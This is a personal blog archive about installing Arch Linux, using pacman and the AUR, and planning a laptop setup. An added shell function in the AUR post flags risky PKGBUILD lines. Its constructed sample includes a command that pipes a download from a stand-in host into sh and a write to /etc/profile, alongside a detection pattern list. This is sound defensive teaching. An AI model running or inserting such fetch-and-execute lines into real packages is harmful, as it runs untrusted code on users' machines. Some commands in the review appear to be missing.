Thursday, January 29, 2009

Change in Format

Well, this is my first post in almost a year and a half. I haven't been able to keep up with the blog as much as I had hoped so the new plan is to refocus the subject matter. Bear with me for a moment.

When I started the blog, the plan was to rant on just about anything that struck my fancy, mostly computer-related. Well, that sounds all well and good but it was actually quite limiting. I wanted to talk about anything and everything and I just didn't have the time for that. So now, the plan is to talk about computer security (or INFOSEC) related issues that arise. The thing about that is there are a million blogs/websites concerning computer security so I'm only going to talk about those that I feel I have a particularly insightful take on. That should limit the content by itself since there are many in the security industry far more knowledgeable than me. I still may make the occasional divergence into some topic completely non-related to INFOSEC and I hope whatever readers I do have will forgive me for that.

Anyways, I'm working on my first "new format" idea so I'll try and have that post up ASAP.

Wednesday, September 26, 2007

New (Good) Post Coming Soon

I know I haven't posted anything in a while but that's because I really have nothing to post about. Sure, I could ramble on about something non-computer related that was bothering me but no one wants to hear about that so I try to keep this blog mostly related to tech and computer stuff. The problem is: since I've been running Arch, I haven't had any problems worthy of making a post about. Everything in Arch "just works" to the point that posting something about it would be unnecessary. Heck, even just a couple of days ago, I had what I thought would be a major project in turning my Arch install into a temporary LAMP server for an upcoming school project. I thought this would require a lot of my time, thinking I could make a good post about it that would really help someone out. But the whole thing was done in a matter of 5 minutes! If you just follow the directions on the Arch Wiki about LAMP, it really is idiot-proof. I love this distro!

Alas, now I do have something worthy of posting. I ordered a laptop last week (yay). It's a Dell D630 and my company paid for it (suckers!). Yet it is my personal laptop and I take it with me wherever I go even if I leave the company. Anyways, here are a few of the specs:

Intel Core 2 Duo T7300, 2.00GHz, 800MHz 4M L2 Cache, Dual Core
14.1 inch Wide Screen WXGA LCD for Latitude D630
2.0GB, DDR2-667 SDRAM, 2 DIMM for Dell Latitude Notebooks
Intel Integrated Graphics Media Accelerator X3100 Latitude D630
80GB Hard Drive 9.5MM 7200RPM for Latitude DX30
Touchpad with UPEK fingerprint reader, Latitude D630
Dell Wireless 360 Bluetooth Module for XP, Latitude
90W AC Adapter for Latitude D-Family, Factory Tied
8X DVD+/-RW w/ Roxio Creator
Intel 3945 WLAN (802.11a/g) mini Card Latitude, Factory Install

I must say, it's a pretty nifty machine, even though I haven't even received it yet. The one thing that bums me out a little bit is that they didn't have the WXGA+ screen available. The sales rep said it would delay my shipment 20 days if I wanted it so I just did away with it.

Anyways, my plan is to shrink the pre-shipped Windows partition down to about 10 GB, or however small I can make it while still being able to do some basic development work on it, and then install Arch to the rest of the hard drive. My company won't let me do away with Windows completely so I have to keep it around. I'm also going to make XFCE the Desktop Environment. I wanted a (relatively) light GUI to keep battery usage to a minimum and decided on XFCE. I thought about Openbox or Fluxbox but the truth is I don't have enough experience with any of those really lightweight window managers to feel confident in installing them and configuring them to my liking. Unfortunately, I'm not the über nerd some members of the Arch Forum are that can configure one of those to look really good. That's not meant to offend anyone who does possess the capability; I envy their talents and effort but don't really have the time nor the inclination to study up on those things. Maybe I'll do that one day down the road but I'd like to get a working system first and then experiment with them.
So, my plan is to get everything working: wireless, bluetooth, fingerprint reader and all the other little gizmos that come with the D630. I'm going to document the whole thing and post the results and associated process(es) that came along with it for the benefit of anyone who plans to install Arch on a similar laptop with similar hardware. I think I'll even make an entry on the Wiki about it seeing as how there currently isn't one. There's a very sparse entry for the D620 (the previous generation of the 630) but it doesn't offer much in the way of help. So, stay tuned for that. I've already started researching and am excited about getting this baby up and running. In my experience, Linux is an entirely different beast on laptops so it should be interesting.

Monday, July 16, 2007

A Lesson in AUR

So, after using Arch for a couple of months, I've gained some valuable knowledge that might be of some use for someone new to or interested in Arch. After getting most of what I needed for a suitable system from Arch's repos, I decided to expand my horizons a bit and try installing some packages from the Arch User Repository or AUR. There are lots of packages available in the AUR. Most of them aren't what you'd consider required packages but rather ancillary programs that are nice to have around for convenience's sake.

Here's a list of just some of the apps I installed from the AUR:
Cairo Clock
As you can see, most of these programs aren't required for most users, with the possible exception of Skype, but they are nice to have around. If these programs, or another you've found by searching the AUR, are interesting to you I'll give you some tips on how to use the AUR. Keep in mind that the following aren't official directions (consult the many Arch Wiki entries for that), simply a collection of observations I've picked up by working my way through the AUR.

The first thing you'll want to do is enable the community repository in /etc/pacman.conf. This is a very simple step, just uncomment the entry for it. Then you'll want to install some tools that you'll need to create a suitable package for your system based on the tarball that's available in the AUR. Use pacman to install makepkg, fakeroot and versionpkg. You may also need subversion if you plan on installing things with svn.

Now that you've got the tools, go to the AUR's website and find the package that you'd like to install. Download the tarball and copy it to /var/abs/local. This will be your working directory for most AUR-related operations. You can also use ~/builds if you'd like but I like to keep /home separated from everything else whenever I can. You can use it if you'd like, it will prevent some annoying permissions problems when installing things.

The next step is to extract the package which will create a new directory that you will then "cd" into. Once there, check the PKGBUILD file for any malicious commands. If anything looks suspicious, DO NOT proceed. If everything's copasetic, then create a package for pacman to install by running makepkg. If successful, this will create a .pkg.tar.gz file that can then be installed by running:
#pacman -U package_name.pkg.tar.gz
Then, the program can be run just like any other. In fact, in most cases, if you're using Gnome, an entry will automatically be made to the menu. Basically, if makepkg doesn't fail, you're set. In some cases (if you're using an i686 processor), you'll get an error, something about an architecture not being described. If you get that, simply add a line to the PKGBUILD file that looks like this: "arch=('i686')".
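
One way to make the "check the PKGBUILD" step above repeatable, as an added example that is not part of the original post and not an official Arch tool: a POSIX shell function that lists the lines worth reading closely before running makepkg. The function names audit_pkgbuild and sample_pkgbuild, the pattern list and the sample PKGBUILD are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original post. The pattern list is an
# illustrative assumption, not an official Arch Linux check.

# audit_pkgbuild FILE
# Prints "label:line:text" for each PKGBUILD line worth reading closely and
# exits 1 if anything was flagged, 0 otherwise. Comment lines are ignored.
audit_pkgbuild() (
    file=$1
    found=0
    # Each row of the list below is: label, then an extended regex (no spaces).
    while read -r label pattern; do
        hits=$(grep -nE -e "$pattern" "$file" |
               grep -vE '^[0-9]+:[[:space:]]*#' || true)
        [ -n "$hits" ] || continue
        found=1
        printf '%s\n' "$hits" | sed "s/^/$label:/"
    done <<'EOF'
pipe-to-shell (curl|wget)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)
eval (^|[^[:alnum:]_])eval[[:space:]]
encoded-payload base64[[:space:]]+(-d|--decode)
privilege (^|[^[:alnum:]_])(sudo|su)[[:space:]]
outside-pkgdir (^|[[:space:]"=>])(/etc|/usr|/bin|/home|/root|~)/
install-script ^install=
EOF
    # Flag a PKGBUILD that declares no checksum array for its sources.
    if ! grep -Eq '^(md5|sha[0-9]+)sums=' "$file"; then
        echo "no-checksums:0:no md5sums/sha*sums array found"
        found=1
    fi
    exit "$found"
)

# Constructed sample input (not a real AUR package).
sample_pkgbuild() {
    cat <<'EOF'
pkgname=example-clock
pkgver=0.1
pkgrel=1
arch=('i686')
source=(http://example.invalid/$pkgname-$pkgver.tar.gz)
install=example-clock.install
# curl http://example.invalid/x | sh   (comment only, ignored)
build() {
  cd $startdir/src/$pkgname-$pkgver
  ./configure --prefix=/usr
  make || return 1
  make DESTDIR=$startdir/pkg install
  curl -s http://example.invalid/setup.sh | sh
  echo 'export FOO=1' >> /etc/profile
}
EOF
}

# Demo: audit the constructed sample.
demo=$(mktemp)
sample_pkgbuild > "$demo"
audit_pkgbuild "$demo" || echo "Read the flagged lines before running makepkg."
rm -f "$demo"
```

A clean result only means none of these patterns matched; the PKGBUILD and any file named by install= (which pacman runs as root at install time) still need to be read.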

This is the standard practice for installing packages from the AUR but if you are looking for a more streamlined approach you may want to try aurbuild. aurbuild is a tool that will essentially perform all of the steps described above for you. You can install it from the AUR with the method I described above and then install packages from the AUR with:
#aurbuild -sa package_name
You should read the man page on aurbuild to understand all of the command line options but that is the generic command to install something.

I should mention that I've only had about an 80% success rate when trying to install something from the AUR. I sometimes get an obscure error message that leaves me a little unsure of what to do next. Even when I install something successfully, I still have problems trying to run it. I've had a few segmentation faults which I don't really feel like sorting through. I had enough of debugging seg faults in college; it's not something I enjoy doing.
Anyways, I hope you've learned a little bit about Arch and a little bit about the AUR from this article, at least enough so that you could install something from there if you so desired. Good luck.

Friday, June 22, 2007

Arch Linux: An Observational Review

Having spent two solid years using Redhat/Fedora products, I began to look for a new Linux distribution that would satisfy my needs as a user but eliminate some of the bloat of the RPM-based distribution I’ve grown so accustomed to. I tried all of the more popular distros: Ubuntu, SuSE, Debian and MEPIS but none of them seemed to possess any of the more streamlined qualities I was looking for. My quest eventually led me to Arch Linux.

Arch Background
Arch is a relatively young distribution that has its roots in Canada. Its founder, Judd Vinet, professes the Arch Way on the distro’s Wiki:
freedom of choice, keep it simple, learning, and user-control

These principles have shaped Arch into an advanced, lightweight distribution intended for the more experienced Linux user.

If you plan on installing Arch, you should have at least a moderately experienced background installing and using Linux systems. Arch is not impossible for newbies to install and use, in fact there is a section of the Arch wiki devoted explicitly to this demographic, but it will require you to configure some aspects of your system by yourself. While this guide requires at least a cursory knowledge of your system, it does walk you through some of those manual configurations. Still, you’ll need to know something about your hard drive’s partitioning scheme and your network layout.

On that note, I feel obliged to mention that Arch seems to be a distribution that functions best on a high speed Internet connection. This isn’t mandatory but if you plan on installing a Desktop Environment/Window Manager (KDE, Gnome, XFCE, Fluxbox…) you’ll have to download it from Arch’s repositories (they’re not available on the install CD) and this process can be difficult on a dialup connection.

Moving on, my Arch install process was split up into 8 steps:

1. Run Setup
2. Prepare Hard Drive
3. Select Packages
4. Install Packages
5. Configure System
6. Install Kernel
7. Install Bootloader
8. Exit Install

1. The first step is simple, just run /arch/setup from the command prompt when you boot your computer with the Install CD in your CD-ROM drive.

2. Preparing the hard drive can be automated by the install process but this automation will blow away your entire hard drive. If you need to keep a Windows or other Linux partition around, you’ll have to configure this step yourself. Don’t fear! It’s not difficult if you know which partitions you need to keep.

3. By default, Arch only installs a minimal system, allowing you to fine-tune your system as you see fit. However, you can add some packages that you know you’ll need by checking the boxes next to the software that you want installed. Arch recommends only installing the default package set but you are free to add what you need. Again, this process is very straightforward.

4. Installing the packages you’ve selected requires pressing Enter on the keyboard. How difficult is that? The process may take a couple of minutes, depending on the size of your package selection.

5. Configuring your system will probably be the most difficult part of the install process for you. You can choose not to edit any system files at all but this may hinder your system’s functionality and performance after the install process. This step involves editing some of the files in /etc including rc.conf, hosts, fstab, modprobe.conf, modules.conf, resolv.conf and profile. If you have no idea what any of these files do or don’t even know where to start in terms of editing them, don’t worry, the install guide explains each of their functions within the system and it can help you determine what you do need to add/change/edit, if anything.

6. Installing the kernel essentially means just choosing which kernel is best for you but Arch recommends installing the 2.6.x kernel with support for SATA/SCSI/IDE. The actual installation of the kernel will be done for you by the installer.

7. Same goes for installing the bootloader. Just choose if you want GRUB or LILO. I chose GRUB simply for familiarity’s sake.

8. Exiting the install will reboot your computer and drop you into a command prompt.

All told, it took me about 10 minutes to complete the install and most of that time was spent setting up a partitioning scheme that included a Windows partition, another Linux partition, a swap partition and a home partition that I planned on sharing between the two Linux systems.

System Setup
You now have a fully functioning Arch system but we’re not done yet. At the command prompt, you are greeted by a text login screen. Login with the username of root and no password. The first thing you’ll probably want to do is set a password for root. This can be done with the following command:
passwd root

You’ll then be asked twice to enter a password for root. Remember that the next time you log in as root, you’ll have to enter that password. The next thing I recommend doing is to set up a regular user. As root, you can do this with the following command:
useradd -m -s /bin/bash myuser

Replace “myuser” with the username that you wish to have. It would then be wise to create a password for that user. This can be done with the same method that you created a password for root.

Now that you have a proper user configuration, you’ll want to connect to the Internet and use pacman to update your system. The first thing to determine is if your machine has an active Internet connection. An easy way to do this is to ping Google:

If you get a response from Google (i.e. you received packets from them) you’re ready to proceed. If you got an “unknown host” error, you still have some tinkering to do.

First, check to see if you have an IP address with

If you do, check the contents of your /etc/resolv.conf file. This file tells the computer where to look for a DNS server. If the file is not populated with the IP addresses of your ISP’s DNS Servers, add these two lines to it:

These two IP addresses are for the OpenDNS servers that are freely accessible. The last thing to check is your routing table. If you’re behind a router, say on a home network, you’ll have to add that router’s IP address to the routing table as the default gateway. Details for this procedure can be found later in the article.

Package Management
As a somewhat experienced Linux user, hopefully you are familiar with the concept of package management. Maybe you’ve used package managers like apt-get, yum, urpmi or portage. Well, Arch Linux has its own package manager and it is called pacman. Arch is a binary based Linux distribution that uses .pkg.tar packages. Using pacman to install these packages will keep you from experiencing the inevitable headaches that come with trying to install source packages yourself.

Like other package managers, pacman has access to online repositories, from which it can install any software you’d like. There are two default pacman repositories: current and extras. Most software can be retrieved from one of these two but there is also a third repository that you can add if you wish. This third repository is the Arch User Repository (AUR) and contains packages contributed by Arch users. With these three repositories, you would be hard-pressed to find a piece of software you need that could not be installed with pacman. Instructions for using the AUR can be found here.
Pacman usage is rather straightforward. I won’t go into great detail on this subject (you can find an entry for pacman on the Arch Wiki) but I will give you some basic commands that you’ll need to install/remove packages and update your system. Pacman is divided into operations (which are denoted by capital letters) and options (denoted by lowercase letters). Keep in mind that these commands require root privileges. To perform a full system upgrade, execute:
pacman -Syu

The “S” operation syncs the local package database (on your machine) with the repositories’ package database. The “y” option refreshes the package list on your machine with the package list from the online servers. The “u” option performs the actual upgrade. You should execute this command after installation and every day thereafter. To install a package, execute:
pacman -S package_name

We’ve already mentioned what the “S” operation does; appending a package name to the end of the command will search the online repositories for that package name, download the package (along with its required dependencies) to your machine and install it. To remove a package, execute:
pacman -R package_name

This is a generic remove command. It is recommended that you consult the Arch Wiki and pacman manual for a more refined method of removing packages. To query the online repositories to check for the existence of a certain package, execute:
pacman -Ss package_name

The “s” option is a search operation for the sync databases. To search your own system to see if a package is already installed, execute:
pacman -Qs package_name

The “Q” operation queries the local database and, combined with the “s” option, can tell you whether or not a certain package is installed.

As you can see, pacman is very easy to use but I must reiterate: read through the pacman page on the Arch Wiki and the pacman manual. After your install, you can use pacman to install a Desktop Environment/Window Manager. Consult the Wiki for more details.

Personal Observations
Well, so far I have tried to maintain a degree of objectivity; giving new Arch users a rundown of the experience I had installing Arch and advising them on some of the tips that helped me get a working system. I have been using Arch for approximately two months and I have grown very fond of it. It has fulfilled my needs as a lightning fast distribution with a simple philosophy. It has the added bonus of having a terrific foundation. The Arch Wiki, discussion board and AUR are all officially endorsed by the project and can be found on the same website.

I will now try to describe a couple of the problems I had installing and setting up my system and how I resolved them:

• Initially, the installer recognized my hard drive as hda (as most distributions did seeing as how it is an IDE drive). However, after installation and running a pacman -Syu, I rebooted to a terrible error about superblock not describing a correct ext2 filesystem. After much googling, I realized that the system upgrade had replaced my kernel with a new one and that the new one recognized my hard drive as sda (it seems most of the newer releases of the major distributions are doing this now). The fix was fairly simple: I just had to change the entry in /boot/grub/menu.lst to compensate for this change.
• I also did not have an active internet connection. My router had leased me an IP address, my /etc/resolv.conf had set up the appropriate DNS servers but I couldn't connect to the internet. After yet even more googling, I found that I had to set my router as the default gateway in my routing table. This was done with the following command:

route add default gw dev eth0

What I really like about Arch is that all the software I need is available in one of the three repositories. As a long time Fedora user, I was used to the process of importing third party repositories to install software that I needed. I was always wary of that method but I’m happy to report that I have now equipped my Arch system with every piece of software I’ve ever used on Linux (with the superb guidance of the Arch Wiki), and all of it was contained in Arch’s repositories. There’s also no need to download the latest releases of Arch as they are made available. Simply running pacman -Syu will upgrade your system to the latest.

Another thing I really like about Arch is that it’s lightning fast, even with a Gnome desktop. There are significant performance improvements over any distribution I’ve used in the past. If I ever got into any of the lighter WM’s like Openbox or Fluxbox, I can imagine just how powerful the system can get.

The last thing I want to mention about Arch is the Arch Build System (ABS). The ABS is used to build packages for software that is not yet available and to customize existing packages for your system. You would probably not have a need for the first option but if you have auxiliary hardware that needs to be integrated with the kernel, it may be necessary to compile drivers using the ABS.

I may have found my new everyday distribution. Arch is very fast and efficient but that performance doesn’t come at the cost of ease of use. Pacman is the best package manager I have used; anything you need to know how to do can be found on the Arch Wiki and any software you need can be found in the Arch repositories. I would encourage anybody looking for a simple, fast Linux distribution to give Arch a test drive. If you have a good knowledge base with Linux systems, you may find yourself to be a devoted Archer.

Thursday, June 21, 2007

First Blog Post

Somehow you've straggled across my blog. I don't know how; I haven't linked to it anywhere. But anyways, I'll post here anything I think is interesting or useful to others. Most entries will probably be about or relating to Linux. I'm a big fan of open source software and am willing to help anybody make the transition to it if they so desire.

Now a little about myself:
I am a software engineer for a government contractor here in Northern Virginia. I have experience with various languages including, but not limited to Java, C/C++, Perl, Python and Bash. I also have experience with Information/Network Security, various protocols and server applications. My knowledge is nowhere near perfect (nobody's is) but I am willing to help you out with what I can. Most of this knowledge is centered around Linux environments but not entirely. I am a proficient Windows user.

I graduated with a Bachelor's Degree in Computer Science with a minor in Mathematics and I am currently working towards a Masters Degree in Information Security. I enjoy golfing, fishing and watching all kinds of sports but most of all, I like to spend time with good people.

I guess that's about it for now. If I think of anything to talk about, I will post it here and you can feel free to use whatever advice you can take from this pathetic little blog.